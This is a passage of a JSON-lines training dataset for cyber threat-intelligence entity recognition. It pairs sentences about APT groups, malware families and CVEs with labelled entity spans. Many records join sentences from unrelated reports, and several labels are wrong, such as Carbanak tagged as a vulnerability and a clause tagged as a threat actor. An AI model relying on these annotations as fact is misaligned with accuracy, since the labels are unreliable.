Cisco Talos assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 .", "spans": {"TOOL: Dridex": [[0, 6], [76, 82]], "TOOL: BitPaymer ransomware": [[114, 134]], "ORGANIZATION: Cisco Talos": [[167, 178]]}, "info": {"id": "cyberner_stix_train_004768", "source": "cyberner_stix_train"}} {"text": "Scarlet Mimic also uses the infamous HTRAN tool on at least some of their C2 servers . The Magic Hound has repeatedly used social media to identify and interact with employees at targeted organizations and then used weaponized Excel documents .", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[0, 13]], "TOOL: HTRAN tool": [[37, 47]], "ORGANIZATION: social media": [[123, 135]], "ORGANIZATION: employees": [[166, 175]]}, "info": {"id": "cyberner_stix_train_004769", "source": "cyberner_stix_train"}} {"text": "Based on emails leaked in the dump , a number of Czech firms appear to be in business with the Hacking team , including a major IT partner in the Olympic Games . Sensitive bank documents have be found on the servers that were controlling Carbanak . with an immediate value . 
In most cases , the file is an Excel spreadsheet containing a VBA macro , but we also found four instances where a malicious PowerPoint OLE2 ( PPT ) file was used , possibly indicating the actor 's readiness to use file formats less commonly used in attacks .", "spans": {"VULNERABILITY: Carbanak": [[238, 246]], "MALWARE: malicious PowerPoint OLE2 ( PPT )": [[390, 423]]}, "info": {"id": "cyberner_stix_train_004770", "source": "cyberner_stix_train"}} {"text": "In addition , FANCY BEAR ’s X-Tunnel network tunneling tool , which facilitates connections to NAT-ed environments , was used to also execute remote commands .", "spans": {"THREAT_ACTOR: FANCY BEAR": [[14, 24]], "TOOL: X-Tunnel": [[28, 36]], "TOOL: NAT-ed": [[95, 101]]}, "info": {"id": "cyberner_stix_train_004771", "source": "cyberner_stix_train"}} {"text": "The emails then contained an attachment that was either an executable that appeared to be a text file based on the file name and icon , or a password-protected archive containing an executable file with the password provided in the email .", "spans": {"TOOL: emails": [[4, 10]], "TOOL: email": [[232, 237]]}, "info": {"id": "cyberner_stix_train_004772", "source": "cyberner_stix_train"}} {"text": "These apps would remain available on the Play Store for months and would eventually be re-uploaded . The OilRig group continues to target organizations in the Middle East , in this instance targeting the government of the United Arab Emirates . The remaining commands send feedback by posting data into Google Forms . 
There are also many examples of nation - state actors leveraging contractors to develop offensive capabilities , as shown most recently in contracts between Russia ’s Ministry of Defense and NTC Vulkan .", "spans": {"SYSTEM: Play Store": [[41, 51]], "THREAT_ACTOR: OilRig group": [[105, 117]], "ORGANIZATION: government": [[204, 214]], "TOOL: Google Forms": [[303, 315]], "THREAT_ACTOR: nation - state actors": [[350, 371]], "THREAT_ACTOR: Russia ’s Ministry of Defense": [[475, 504]], "THREAT_ACTOR: NTC Vulkan": [[509, 519]]}, "info": {"id": "cyberner_stix_train_004773", "source": "cyberner_stix_train"}} {"text": "Failed login activity can be indicative of failed intrusion activity .", "spans": {}, "info": {"id": "cyberner_stix_train_004774", "source": "cyberner_stix_train"}} {"text": "Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft . Like previous Turla activity , WhiteBear leverages compromised websites and hijacked satellite connections for command and control ( C2 ) infrastructure .", "spans": {"THREAT_ACTOR: Leafminer": [[0, 9]], "VULNERABILITY: SMB vulnerabilities": [[124, 143]], "ORGANIZATION: Microsoft": [[157, 166]], "MALWARE: WhiteBear": [[200, 209]], "TOOL: C2": [[302, 304]]}, "info": {"id": "cyberner_stix_train_004775", "source": "cyberner_stix_train"}} {"text": "This implies they have made considerable investments . the US had data stolen by members of Emissary Panda . This means that the function responsible for decrypting and executing the payload is executed directly after the load of the malicious DLL . 
LIGHTWORK utilizes positional command line arguments for target device , port , and IEC-104 command .", "spans": {"THREAT_ACTOR: Emissary Panda": [[92, 106]], "TOOL: DLL": [[244, 247]], "TOOL: LIGHTWORK": [[250, 259]], "TOOL: IEC-104": [[334, 341]]}, "info": {"id": "cyberner_stix_train_004776", "source": "cyberner_stix_train"}} {"text": "At the time of writing , a reverse image search for the favicon on Shodan using the query http.favicon.hash:990643579 returned around 40 web servers which use the same favicon . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . The commands used to communicate with the C2 servers and other strings in the binary are written in Ukrainian . Analyzing the code and data from the C2 , Ryan Sherstobitoff and Asheer Malhotra from McAfee , along with the company 's Advanced Threat Research Team ( ATR ) , discovered new variants of the Rising Sun backdoor that were used since at least 2016 .", "spans": {"MALWARE: malicious.DOC": [[264, 277]], "VULNERABILITY: Microsoft Common Controls vulnerability": [[297, 336]], "VULNERABILITY: CVE-2012-0158": [[339, 352]], "TOOL: C2": [[397, 399]], "SYSTEM: C2": [[504, 506]], "ORGANIZATION: Ryan Sherstobitoff": [[509, 527]], "ORGANIZATION: Asheer Malhotra": [[532, 547]], "ORGANIZATION: McAfee": [[553, 559]], "ORGANIZATION: Advanced Threat Research Team ( ATR )": [[588, 625]], "TOOL: Rising Sun backdoor": [[659, 678]]}, "info": {"id": "cyberner_stix_train_004777", "source": "cyberner_stix_train"}} {"text": "Figure 8 . This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx” . 
Filename: C:\\Windows\\beauty.jpg .", "spans": {"MALWARE: document": [[45, 53]], "VULNERABILITY: Trump's_Attack_on_Syria_English.docx”": [[60, 97]], "FILEPATH: C:\\Windows\\beauty.jpg": [[110, 131]]}, "info": {"id": "cyberner_stix_train_004778", "source": "cyberner_stix_train"}} {"text": "Kill / start processes .", "spans": {}, "info": {"id": "cyberner_stix_train_004779", "source": "cyberner_stix_train"}} {"text": "As we ’ ve mentioned earlier , Triada is downloaded by smaller Trojans that have leveraged the access privileges . Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus . This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications , and has largely focused its operations within the Middle East .", "spans": {"MALWARE: Triada": [[31, 37]], "VULNERABILITY: CVE-2018-8414": [[189, 202]], "THREAT_ACTOR: DarkHydrus": [[292, 302]], "ORGANIZATION: financial": [[396, 405]], "ORGANIZATION: government": [[408, 418]], "ORGANIZATION: energy": [[421, 427]], "ORGANIZATION: chemical": [[430, 438]], "ORGANIZATION: telecommunications": [[445, 463]]}, "info": {"id": "cyberner_stix_train_004780", "source": "cyberner_stix_train"}} {"text": "Versions 5.X.X-8.X.X were active in 2016 , and versions 9.X.X-1.X.X in 2017 . In comparison to other threat groups , TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger . We analyzed the kits , which were designed to steal information from the automotive and finance industries , launch subsequent attacks on already compromised systems , and ( possibly ) sell stolen information . 
In some campaigns , the random names are generated by a specific function in the VBA code .", "spans": {"THREAT_ACTOR: TG-3390": [[117, 124]], "TOOL: custom backdoor": [[202, 217]], "TOOL: credential logger": [[222, 239]], "THREAT_ACTOR: the random names are generated by a specific function in the VBA code": [[473, 542]]}, "info": {"id": "cyberner_stix_train_004781", "source": "cyberner_stix_train"}} {"text": "Malicious app com.qualcmm.timeservices As I mentioned before , in the “ initial phase ” , the Trojan will install the “ com.qualcmm.timeservices ” app . This APT group usually carries out target attacks against government agencies to steal sensitive information . The details we have analyzed during hundreds of investigations convince us that the groups conducting these activities are based primarily in China and that the Chinese Government is aware of them . This model is flexible and enables the operators to constantly change how their backdoors retrieve further commands or malcode as needed .", "spans": {"ORGANIZATION: government agencies": [[211, 230]]}, "info": {"id": "cyberner_stix_train_004782", "source": "cyberner_stix_train"}} {"text": "It creates an ID and it downloads a new , interesting backdoor , ( this time ) written in Delphi .", "spans": {"TOOL: Delphi": [[90, 96]]}, "info": {"id": "cyberner_stix_train_004783", "source": "cyberner_stix_train"}} {"text": "In a similar vein with past CyberBerkut activity , attackers hid behind anonymous activist groups like “ anonpoland ” , and data from victimized organizations were similarly leaked and “ weaponized ” .", "spans": {}, "info": {"id": "cyberner_stix_train_004784", "source": "cyberner_stix_train"}} {"text": "In 2018 , we have already observed a small but consistent number of samples . The earliest step in any possible attack(s) involving this variant of KopiLuwak of which Proofpoint researchers are currently aware begin with the MSIL dropper . 
FireEye analysts documented the admin@338 group 's activities in a previous paper titled Poison Ivy : Assessing Damage and Extracting Intelligence paper .", "spans": {"MALWARE: KopiLuwak": [[148, 157]], "MALWARE: MSIL dropper": [[225, 237]], "ORGANIZATION: FireEye": [[240, 247]], "THREAT_ACTOR: admin@338 group": [[272, 287]], "MALWARE: Poison Ivy": [[329, 339]]}, "info": {"id": "cyberner_stix_train_004785", "source": "cyberner_stix_train"}} {"text": "Then it will ask for the accessibility service privilege as visible in the following screenshot : After the user grants the requested privilege , Cerberus starts to abuse it by granting itself additional permissions , such as permissions needed to send messages and make calls , without requiring any user interaction . The SectorJ04 group has maintained the scope of its existing hacking activities while expanding its hacking activities to companies in various industrial sectors located in East Asia and Southeast Asia . The APT39 were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation .", "spans": {"MALWARE: Cerberus": [[146, 154]], "THREAT_ACTOR: SectorJ04": [[324, 333]], "THREAT_ACTOR: APT39": [[528, 533]]}, "info": {"id": "cyberner_stix_train_004786", "source": "cyberner_stix_train"}} {"text": "The intricate anti-analysis methods reveal how much effort the FinFisher authors exerted to keep the malware hidden and difficult to analyze . The Spring Dragon appears to have rolled out a steady mix of exploits against government-related organizations in VN , TW , PH , and other locations over the past few years . The last one is perhaps less obvious . 
Although COSMICENERGY does not directly overlap with any previously observed malware families , its capabilities are comparable to those employed in previous incidents and malware .", "spans": {"MALWARE: FinFisher": [[63, 72]], "THREAT_ACTOR: Spring Dragon": [[147, 160]], "ORGANIZATION: government-related organizations": [[221, 253]], "MALWARE: COSMICENERGY": [[366, 378]], "MALWARE: malware": [[434, 441], [529, 536]]}, "info": {"id": "cyberner_stix_train_004787", "source": "cyberner_stix_train"}} {"text": "There are a lot of small Trojans for Android capable of leveraging access privileges , in other words — gaining root access . This sample was also found to be deployed using the CVE-2012-0158 vulnerability . This realization suggests that the OilRig threat group will continue to use their delivery documents for extended periods with subtle modifications to remain effective .", "spans": {"SYSTEM: Android": [[37, 44]], "VULNERABILITY: CVE-2012-0158": [[178, 191]], "THREAT_ACTOR: OilRig": [[243, 249]], "MALWARE: delivery documents": [[290, 308]]}, "info": {"id": "cyberner_stix_train_004788", "source": "cyberner_stix_train"}} {"text": "These attacks are primarily targeting private industry in search of key intellectual property for competitive advantage , military institutions , and governmental organizations often in search of documents related to current political events and human rights organizations .", "spans": {}, "info": {"id": "cyberner_stix_train_004789", "source": "cyberner_stix_train"}} {"text": "2016 freedns.website streamout.space 2017–2018 : streamout.space sky-sync.pw gms-service.info EventBot : A New Mobile Banking Trojan is Born April 30 , 2020 KEY FINDINGS The Cybereason Nocturnus team is investigating EventBot , a new type of Android mobile malware that emerged around March 2020 . 
The documents that exploit CVE2017-11882 download another payload — an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script — from the server , which is executed accordingly by the command-line tool mshta.exe . We assess with moderate confidence that APT40 is a state-sponsored Chinese Cyber Espionage operation .", "spans": {"MALWARE: EventBot": [[94, 102], [217, 225]], "ORGANIZATION: Cybereason Nocturnus": [[174, 194]], "SYSTEM: Android": [[242, 249]], "VULNERABILITY: CVE2017-11882": [[325, 338]], "TOOL: HTML Application": [[369, 385]], "MALWARE: HTA": [[388, 391]], "MALWARE: mshta.exe": [[521, 530]], "THREAT_ACTOR: APT40": [[573, 578]]}, "info": {"id": "cyberner_stix_train_004790", "source": "cyberner_stix_train"}} {"text": "However , CTU analysis indicates that GOLD LOWELL is motivated by financial gain , and there is no evidence of the threat actors using network access for espionage or data theft . Syncopate is a well-known Russian company that is best known as the developer and operator of the ' GameNet ' platform .", "spans": {"ORGANIZATION: CTU": [[10, 13]], "THREAT_ACTOR: GOLD LOWELL": [[38, 49]], "ORGANIZATION: company": [[214, 221]]}, "info": {"id": "cyberner_stix_train_004791", "source": "cyberner_stix_train"}} {"text": "The type of data corresponding to the value coded in GolfSpy Figure 5 shows the code snippets that are involved in monitoring and recording the device ’ s phone call . The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload . Interestingly , more than 20 artifacts are retrieved from the system by this implant during the reconnaissance stage , from the date and time of operating system installation and membership in a Windows domain to a list of and the resolutions of the workstation’s monitors . 
When they pay for someone else ’s malware kit , whether it be ransomware or a phishing bot , they do n’t have to invest time , money or labor to write their own malicious code or tools and instead can hop right into deploying the malware .", "spans": {"MALWARE: GolfSpy": [[53, 60]], "TOOL: downloader malware": [[172, 190]], "SYSTEM: Windows": [[472, 479]]}, "info": {"id": "cyberner_stix_train_004792", "source": "cyberner_stix_train"}} {"text": "Windows Defender ATP helps network security professionals deal with intrusions from activity groups like LEAD and BARIUM in several ways .", "spans": {"TOOL: Windows Defender ATP": [[0, 20]], "THREAT_ACTOR: LEAD": [[105, 109]], "THREAT_ACTOR: BARIUM": [[114, 120]]}, "info": {"id": "cyberner_stix_train_004793", "source": "cyberner_stix_train"}} {"text": "SHA256 : 4dcf5bd2c7a5822831d9f22f46bd2369c4c9df17cc99eb29975b5e8ae7e88606 .", "spans": {"FILEPATH: 4dcf5bd2c7a5822831d9f22f46bd2369c4c9df17cc99eb29975b5e8ae7e88606": [[9, 73]]}, "info": {"id": "cyberner_stix_train_004794", "source": "cyberner_stix_train"}} {"text": "Downeks can also be instructed to execute binaries that already exist on the victim machine .", "spans": {"MALWARE: Downeks": [[0, 7]]}, "info": {"id": "cyberner_stix_train_004795", "source": "cyberner_stix_train"}} {"text": "To ensure remote access to the workstation of an employee at a target organization , the Cobalt group ( as in previous years ) uses Beacon , a Trojan available as part of commercial penetration testing software . 
Named Trochilus , this new RAT was part of Group 27 's malware portfolio that included six other malware strains , all served together or in different combinations , based on the data that needed to be stolen from each victim .", "spans": {"THREAT_ACTOR: Cobalt group": [[89, 101]], "TOOL: Beacon": [[132, 138]], "MALWARE: Trochilus": [[219, 228]], "MALWARE: RAT": [[240, 243]]}, "info": {"id": "cyberner_stix_train_004796", "source": "cyberner_stix_train"}} {"text": "The sample used in this attack ( MD5 A96F4B8AC7AA9DBF4624424B7602D4F7 , compiled July 29th , 2015 ) was a pretty standard Sofacy x64 AZZY implant , which has the internal name “ advshellstore.dll ” .", "spans": {"FILEPATH: A96F4B8AC7AA9DBF4624424B7602D4F7": [[37, 69]], "THREAT_ACTOR: Sofacy": [[122, 128]], "MALWARE: AZZY": [[133, 137]], "FILEPATH: advshellstore.dll": [[178, 195]]}, "info": {"id": "cyberner_stix_train_004797", "source": "cyberner_stix_train"}} {"text": "Delivering a backdoor and spyware , Desert Falcons 's campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video . CTU researchers have not observed TG-3390 actors performing reconnaissance prior to compromising organizations .", "spans": {"ORGANIZATION: CTU": [[285, 288]], "THREAT_ACTOR: TG-3390": [[319, 326]], "ORGANIZATION: compromising organizations": [[369, 395]]}, "info": {"id": "cyberner_stix_train_004799", "source": "cyberner_stix_train"}} {"text": "The new miner employed by Pacha Group , named Linux.GreedyAntd , has shown to be more sophisticated than the average Linux threat , using evasion techniques rarely seen in Linux malware . 
The intelligence we have collected shows that Silence is part of a more extensive operation , still focused on financial institutions operating mainly on Russian territory .", "spans": {"THREAT_ACTOR: Pacha Group": [[26, 37]], "TOOL: Linux.GreedyAntd": [[46, 62]], "TOOL: Linux malware": [[172, 185]], "ORGANIZATION: financial institutions": [[299, 321]]}, "info": {"id": "cyberner_stix_train_004800", "source": "cyberner_stix_train"}} {"text": "In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . Emissary Panda has used many ACTs with the most notable being the exploits from the Hacking Team leak .", "spans": {"MALWARE: RTF attachments": [[44, 59]], "VULNERABILITY: CVE-2017-0199": [[124, 137]]}, "info": {"id": "cyberner_stix_train_004801", "source": "cyberner_stix_train"}} {"text": "Gooligan then downloads a rootkit from the C & C server that takes advantage of multiple Android 4 and 5 exploits including the well-known VROOT ( CVE-2013-6282 ) and Towelroot ( CVE-2014-3153 ) . A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . where the immediate constant can be different . 
PIEHOP expects its main function to be called via another Python file , supplying either the argument or .", "spans": {"MALWARE: Gooligan": [[0, 8]], "SYSTEM: Android 4 and 5": [[89, 104]], "VULNERABILITY: VROOT": [[139, 144]], "VULNERABILITY: CVE-2013-6282": [[147, 160]], "VULNERABILITY: Towelroot": [[167, 176]], "VULNERABILITY: CVE-2014-3153": [[179, 192]], "THREAT_ACTOR: group": [[227, 232]], "THREAT_ACTOR: hackers": [[251, 258]], "VULNERABILITY: zero-day exploit": [[302, 318]], "THREAT_ACTOR: Gamma Group": [[444, 455]], "TOOL: PIEHOP": [[506, 512]]}, "info": {"id": "cyberner_stix_train_004802", "source": "cyberner_stix_train"}} {"text": "Other infection vectors include pornographic websites serving apps called Adobe Flash or YouPorn . Shrouded Crossbow employs three BIFROST-derived backdoors : BIFROSE , KIVARS , and XBOW . A similar service , vicp.net , is also seen in many of the domains . CSP can define a list of domains that the browser should be allowed to interact with for the visited URL .", "spans": {"SYSTEM: Adobe Flash": [[74, 85]], "SYSTEM: YouPorn": [[89, 96]], "TOOL: BIFROST-derived backdoors": [[131, 156]], "TOOL: BIFROSE": [[159, 166]], "TOOL: KIVARS": [[169, 175]], "TOOL: XBOW": [[182, 186]], "URL: vicp.net": [[209, 217]], "ORGANIZATION: CSP": [[258, 261]], "TOOL: browser": [[300, 307]], "SYSTEM: URL": [[359, 362]]}, "info": {"id": "cyberner_stix_train_004803", "source": "cyberner_stix_train"}} {"text": "Attackers also used the name of the top-ranking official associated with Minister of Home affairs in the signature of the email , this is to make it look like the email was sent by a high-ranking Government official associated with Ministry of Home Affairs ( MHA ) .", "spans": {"TOOL: name of the top-ranking official": [[24, 56]], "ORGANIZATION: Minister of Home affairs": [[73, 97]], "TOOL: email": [[122, 127], [163, 168]], "ORGANIZATION: Ministry of Home Affairs": [[232, 256]], "ORGANIZATION: MHA": [[259, 262]]}, "info": {"id": 
"cyberner_stix_train_004804", "source": "cyberner_stix_train"}} {"text": "Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence . Our prior publication also failed to acknowledge immensely valuable input from a number of colleagues , including Nadim Kobeissi 's feedback on how the API endpoints on the Android malware were encrypted .", "spans": {"THREAT_ACTOR: APT41": [[10, 15]], "VULNERABILITY: exploit": [[52, 59]], "VULNERABILITY: CVE-2019-3396": [[69, 82]], "SYSTEM: Android": [[294, 301]], "MALWARE: malware": [[302, 309]]}, "info": {"id": "cyberner_stix_train_004806", "source": "cyberner_stix_train"}} {"text": "Stick to Google Play and use VPN software from reputable vendors . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions to raise money for the North Korean regime . If you aren’t familiar with those structures ( e.g , The sample of PIEHOP we obtained contains programming logic errors that prevent it from successfully performing its IEC-104 control capabilities , but we believe these errors can be easily corrected .", "spans": {"SYSTEM: Google Play": [[9, 20]], "THREAT_ACTOR: APT38": [[129, 134]], "ORGANIZATION: financial institutions": [[170, 192]]}, "info": {"id": "cyberner_stix_train_004807", "source": "cyberner_stix_train"}} {"text": "It appears that the attackers are somewhat familiar with the language and mountain-trekking culture of the targets – the meaning of “ chuli ” is “ summit ” : The command-and-control server and parameters can be easily seen in the decompiled source code : Command and control server interaction code Throughout the code , the attackers log all important actions , which include various messages in Chinese . Execute a command through exploits for CVE-2018-0802 . 
FinSpy , a final-stage payload that allows for an attacker to covertly learn what a target is talking about and who they are communicating with , is associated with Gamma Group — which goes by other names , including FinFisher and Lench IT Solutions .", "spans": {"VULNERABILITY: CVE-2018-0802": [[446, 459]], "MALWARE: FinSpy": [[462, 468]], "THREAT_ACTOR: attacker": [[512, 520]], "THREAT_ACTOR: Gamma Group": [[627, 638]], "ORGANIZATION: FinFisher": [[679, 688]]}, "info": {"id": "cyberner_stix_train_004808", "source": "cyberner_stix_train"}} {"text": "However , many of these loader samples embed CosmicDuke variants that exploit the CVE-2010- 0232 privilege escalation vulnerability thus making it impossible for the compilation timestamps to be authentic .", "spans": {"MALWARE: CosmicDuke": [[45, 55]], "VULNERABILITY: CVE-2010- 0232": [[82, 96]]}, "info": {"id": "cyberner_stix_train_004809", "source": "cyberner_stix_train"}} {"text": "Emergency SMS commands . Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . APT33 : af41e9e058e0a5656f457ad4425a299481916b6cf5e443091c7a6b15ea5b3db3 S-SHA2 DarkComet . Checking the transcript log file created to see the full session .", "spans": {"MALWARE: Documents": [[25, 34]], "VULNERABILITY: Flash exploit": [[44, 57]], "THREAT_ACTOR: APT33": [[143, 148]], "MALWARE: af41e9e058e0a5656f457ad4425a299481916b6cf5e443091c7a6b15ea5b3db3 S-SHA2 DarkComet": [[151, 232]]}, "info": {"id": "cyberner_stix_train_004810", "source": "cyberner_stix_train"}} {"text": "Indian organizations targeted in Suckfly attacks .", "spans": {"THREAT_ACTOR: Suckfly": [[33, 40]]}, "info": {"id": "cyberner_stix_train_004811", "source": "cyberner_stix_train"}} {"text": "APT41 has executed multiple software supply chain compromises , gaining access to software companies to inject malicious code into legitimate files before distributing updates . 
Furthermore , it has similar code logic as previous ones wuaupdt.exe in this attack appears in previous Donot attack , and C2 addresses are same to previous ones .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "FILEPATH: wuaupdt.exe": [[235, 246]], "TOOL: C2": [[301, 303]]}, "info": {"id": "cyberner_stix_train_004812", "source": "cyberner_stix_train"}} {"text": "While these industries may appear to be unrelated , we found them to have multiple links to healthcare , such as large manufacturers that produce medical imaging devices sold directly into healthcare firms , IT organizations that provide support services to medical clinics , and logistical organizations that deliver healthcare products . Between June 2008 and March 2009 the Information Warfare Monitor conducted an extensive and exhaustive two-phase investigation focused on allegations of Chinese cyber espionage against the Tibetan community .", "spans": {"ORGANIZATION: healthcare": [[92, 102], [318, 328]], "ORGANIZATION: healthcare firms": [[189, 205]], "ORGANIZATION: IT organizations": [[208, 224]], "ORGANIZATION: medical clinics": [[258, 273]], "ORGANIZATION: logistical organizations": [[280, 304]], "TOOL: Information Warfare Monitor": [[377, 404]], "ORGANIZATION: Tibetan community": [[529, 546]]}, "info": {"id": "cyberner_stix_train_004813", "source": "cyberner_stix_train"}} {"text": "The threat actors retrieved the NTDS.dit file from the volume shadow copy .", "spans": {"FILEPATH: NTDS.dit": [[32, 40]]}, "info": {"id": "cyberner_stix_train_004814", "source": "cyberner_stix_train"}} {"text": "Sometimes , both malware have used the same C&C server , but in other cases , even the servers have been different .", "spans": {"TOOL: C&C": [[44, 47]]}, "info": {"id": "cyberner_stix_train_004815", "source": "cyberner_stix_train"}} {"text": "In particular , these apps try to add an additional method called statistics ( ) into the Activity class . 
In July , Nitro compromised a South Korean clothing and accessories manufacturer 's website to serve malware commonly referred to as \" Spindest \" . The difference in sponsorship could be the result of tasking systems that allocate targeting responsibility to different groups based on their targets ’ geographic location . Local investigators later confirmed that the energy outage was caused by a cyberattack .", "spans": {"TOOL: Spindest": [[242, 250]], "ORGANIZATION: Local investigators": [[430, 449]], "THREAT_ACTOR: cyberattack": [[505, 516]]}, "info": {"id": "cyberner_stix_train_004816", "source": "cyberner_stix_train"}} {"text": "Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits . Filensfer is a family of malware that has been used in targeted attacks since at least 2013 .", "spans": {"THREAT_ACTOR: Zebrocy": [[0, 7]], "VULNERABILITY: 0day exploits": [[132, 145]], "FILEPATH: Filensfer": [[148, 157]]}, "info": {"id": "cyberner_stix_train_004817", "source": "cyberner_stix_train"}} {"text": "For example , the botnet Trojan-SMS.AndroidOS.Opfake.a , in addition to its own activity , also spread Backdoor.AndroidOS.Obad.a by sending spam containing a link to the malware to the victim ’ s list of contacts . Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can′t prove they were related to this particular attack . 
About the “ Winnti Group ” naming : After gaining access to a victim network , UNC2452 has a light malware footprint , often using legitimate credentials to access data and move laterally .", "spans": {"MALWARE: Trojan-SMS.AndroidOS.Opfake.a": [[25, 54]], "MALWARE: Backdoor.AndroidOS.Obad.a": [[103, 128]], "VULNERABILITY: CVE-2017-11882": [[280, 294]], "TOOL: Microsoft Office Equation Editor": [[297, 329]], "THREAT_ACTOR: Winnti Group": [[468, 480]], "THREAT_ACTOR: UNC2452": [[535, 542]], "THREAT_ACTOR: a light malware footprint , often using legitimate credentials to access data and move laterally": [[547, 643]]}, "info": {"id": "cyberner_stix_train_004818", "source": "cyberner_stix_train"}} {"text": "Some FinFisher variants incorporate an MBR rootkit , the exact purpose of which is not clear . A paper from FireEye in 2013 on several campaigns using PIVY included menuPass as one of them . Finally , the launcher passes control to the main backdoor routine . Iranian APT group Siamesekitten PDF was identified as responsible for a supply chain attack campaign that targeted IT and communication companies in Israel .", "spans": {"MALWARE: FinFisher": [[5, 14]], "ORGANIZATION: FireEye": [[108, 115]], "TOOL: PIVY": [[151, 155]], "THREAT_ACTOR: Iranian APT group": [[260, 277]], "THREAT_ACTOR: Siamesekitten PDF": [[278, 295]], "ORGANIZATION: IT and communication companies": [[375, 405]]}, "info": {"id": "cyberner_stix_train_004819", "source": "cyberner_stix_train"}} {"text": "It mentions closing the Fatah headquarters and houses that were identified as meeting places as well as the arrest of some members of the party .", "spans": {"ORGANIZATION: Fatah": [[24, 29]]}, "info": {"id": "cyberner_stix_train_004820", "source": "cyberner_stix_train"}} {"text": "CYBEREASON MOBILE Cybereason Mobile detects EventBot and immediately takes remediation actions to protect the end user . 
FireEye believes that two actors – Turla and an unknown financially motivated actor – were using the first EPS zero-day CVE-2017-0261 , and APT28 was using the second EPS zero-day CVE-2017-0262 along with a new Escalation of Privilege (EOP) zero-day CVE-2017-0263 . PwC UK and BAE Systems assess it is highly likely that APT10 is a China-based threat actor with a focus on espionage and wide ranging information collection .", "spans": {"SYSTEM: CYBEREASON MOBILE": [[0, 17]], "SYSTEM: Cybereason Mobile detects": [[18, 43]], "MALWARE: EventBot": [[44, 52]], "ORGANIZATION: FireEye": [[121, 128]], "THREAT_ACTOR: actors": [[147, 153]], "ORGANIZATION: financially": [[177, 188]], "VULNERABILITY: CVE-2017-0261": [[241, 254]], "THREAT_ACTOR: APT28": [[261, 266]], "VULNERABILITY: CVE-2017-0262": [[301, 314]], "VULNERABILITY: CVE-2017-0263": [[371, 384]], "ORGANIZATION: PwC UK": [[387, 393]], "ORGANIZATION: BAE Systems": [[398, 409]], "THREAT_ACTOR: APT10": [[442, 447]]}, "info": {"id": "cyberner_stix_train_004821", "source": "cyberner_stix_train"}} {"text": "The OceanLotus group was first revealed and named by QiAnXin in May 2015 . It also reconfigures the Microsoft Sysinternals registry to prevent pop-ups when running the PsExec tool . Waterbug also used an older version of PowerShell , likely to avoid logging . In one of these campaigns , Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest . 
The malware then uses WebDAV to upload the RAR archive to a Box account .", "spans": {"THREAT_ACTOR: OceanLotus": [[4, 14]], "ORGANIZATION: QiAnXin": [[53, 60]], "ORGANIZATION: Microsoft": [[100, 109]], "MALWARE: PsExec tool": [[168, 179]], "THREAT_ACTOR: Waterbug": [[182, 190], [288, 296]], "MALWARE: PowerShell": [[221, 231]], "MALWARE: USB stealer": [[304, 315]], "FILEPATH: malware": [[401, 408]], "MALWARE: WebDAV": [[419, 425]], "FILEPATH: RAR archive": [[440, 451]]}, "info": {"id": "cyberner_stix_train_004822", "source": "cyberner_stix_train"}} {"text": "The agroup targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy . When we last heard from the Trojan , its operators were seen launching redirection attacks on four large , U.S. banks in June .", "spans": {"THREAT_ACTOR: agroup": [[4, 10]], "ORGANIZATION: media": [[31, 36]], "THREAT_ACTOR: admin@338": [[55, 64]], "TOOL: remote access Trojans": [[122, 143]], "TOOL: Poison Ivy": [[152, 162]], "ORGANIZATION: government": [[173, 183]], "ORGANIZATION: financial firms": [[188, 203]], "ORGANIZATION: global economic": [[220, 235]], "MALWARE: Trojan": [[273, 279]], "ORGANIZATION: banks": [[357, 362]]}, "info": {"id": "cyberner_stix_train_004823", "source": "cyberner_stix_train"}} {"text": "Finally , the Ashas adware family has its code hidden under the com.google.xxx package name . In their current campaign , APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros . 
Email Security can block malicious emails sent by threat actors as part of their campaign .", "spans": {"MALWARE: Ashas": [[14, 19]], "THREAT_ACTOR: APT32": [[122, 127]], "MALWARE: ActiveMime files": [[142, 158]], "TOOL: Email Security": [[242, 256]], "TOOL: emails": [[277, 283]]}, "info": {"id": "cyberner_stix_train_004824", "source": "cyberner_stix_train"}} {"text": "It means the phone can be unblocked in some cases when it has been blocked by one of the above HTML pages . The executable would install the real Ammyy product , but would also launch a file called either AmmyyService.exe or AmmyySvc.exe which contained the malicious payload . The Leviathan , whose espionage activities primarily focus on targets in the US and Western Europe with military ties , has been active since at least 2014 .", "spans": {"MALWARE: AmmyyService.exe": [[205, 221]], "MALWARE: AmmyySvc.exe": [[225, 237]], "THREAT_ACTOR: Leviathan": [[282, 291]], "ORGANIZATION: military": [[382, 390]]}, "info": {"id": "cyberner_stix_train_004825", "source": "cyberner_stix_train"}} {"text": "ProGuard Obfuscation As with many other Android applications , EventBot is now using obfuscation . After app installation , whenever SWAnalytics senses victims opening 